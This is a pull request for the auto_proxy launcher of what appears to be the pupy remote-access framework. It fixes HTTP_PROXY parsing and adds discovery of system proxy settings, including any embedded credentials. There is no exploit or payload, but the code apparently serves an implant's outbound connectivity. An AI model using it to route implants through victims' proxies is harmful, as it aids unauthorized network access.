### PR TITLE
Several Improvements to auto_proxy functionality

### DIFF
--- a/pupy/network/launchers/auto_proxy.py
+++ b/pupy/network/launchers/auto_proxy.py
@@ -100,22 +100,18 @@ def get_proxies(wpad_timeout=600):
 		user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$",env_proxy).groups()
 		yield ('HTTP', proxy, user, passwd)
 
-	try:
-		python_proxies = urllib.getproxies()
-	except:
-		python_proxies = urllib.request.getproxies()    
+	python_proxies = urllib.getproxies()    
     
-	if len(python_proxies) > 0:
-		for key in python_proxies:
-			if key.upper() in ('HTTP', 'HTTPS', 'SOCKS') and python_proxies[key] != '':
-				user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$",python_proxies[key]).groups()
-				
-				if key.upper() == 'SOCKS':
-					key = 'SOCKS4'
-				elif key.upper() == 'HTTPS':
-					key = 'HTTP'	
-				    
-				yield(key.upper(), proxy, user, passwd)
+	for key in python_proxies:
+		if key.upper() in ('HTTP', 'HTTPS', 'SOCKS') and python_proxies[key] != '':
+			user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$",python_proxies[key]).groups()
+			
+			if key.upper() == 'SOCKS':
+				key = 'SOCKS4'
+			elif key.upper() == 'HTTPS':
+				key = 'HTTP'	
+			    
+			yield(key.upper(), proxy, user, passwd)
 
 	if last_wpad is None or time.time()-last_wpad > wpad_timeout: # to avoid flooding the network with wpad requests :)
 		last_wpad=time.time()

--- a/pupy/network/launchers/auto_proxy.py
+++ b/pupy/network/launchers/auto_proxy.py
@@ -12,6 +12,8 @@ import os
 import socket
 import time
 import subprocess
+import urllib
+
 try:
 	from urllib import request as urllib
 except ImportError:
@@ -92,11 +94,28 @@ def get_proxies(wpad_timeout=600):
 
 		except Exception:
 			pass
-
+    
 	env_proxy=os.environ.get('HTTP_PROXY')
 	if env_proxy:
-		user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$","http://proxy.domain.com:3128").groups()
+		user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$",env_proxy).groups()
 		yield ('HTTP', proxy, user, passwd)
+
+	try:
+		python_proxies = urllib.getproxies()
+	except:
+		python_proxies = urllib.request.getproxies()    
+    
+	if len(python_proxies) > 0:
+		for key in python_proxies:
+			if key.upper() in ('HTTP', 'HTTPS', 'SOCKS') and python_proxies[key] != '':
+				user, passwd, proxy=re.match("^(?:https?://)?(?:(?P<user>\w+):?(?P<password>\w*)@)?(?P<proxy_addr>\S+:[0-9]+)$",python_proxies[key]).groups()
+				
+				if key.upper() == 'SOCKS':
+					key = 'SOCKS4'
+				elif key.upper() == 'HTTPS':
+					key = 'HTTP'	
+				    
+				yield(key.upper(), proxy, user, passwd)
 
 	if last_wpad is None or time.time()-last_wpad > wpad_timeout: # to avoid flooding the network with wpad requests :)
 		last_wpad=time.time()
@@ -109,7 +128,6 @@ def get_proxies(wpad_timeout=600):
 				yield ('HTTP', p, None, None)
 		except Exception as e:
 			pass
-
 
 
 class AutoProxyLauncher(BaseLauncher):


### PR DESCRIPTION
Fixed a bug in auto_proxy where attempts to parse HTTP_PROXY environment variables was parsing hardcoded string instead of environment variable value.

Added attempt to configure proxy using urllib.getproxies().  This method will automatically returns global proxy configs for OSX and Windows and also for the HTTP_PROXY variable.  It doesn't return username/passwords unless those are hardcoded in the proxy string, but still is yet one more way you might be able to get proxy settings automatically.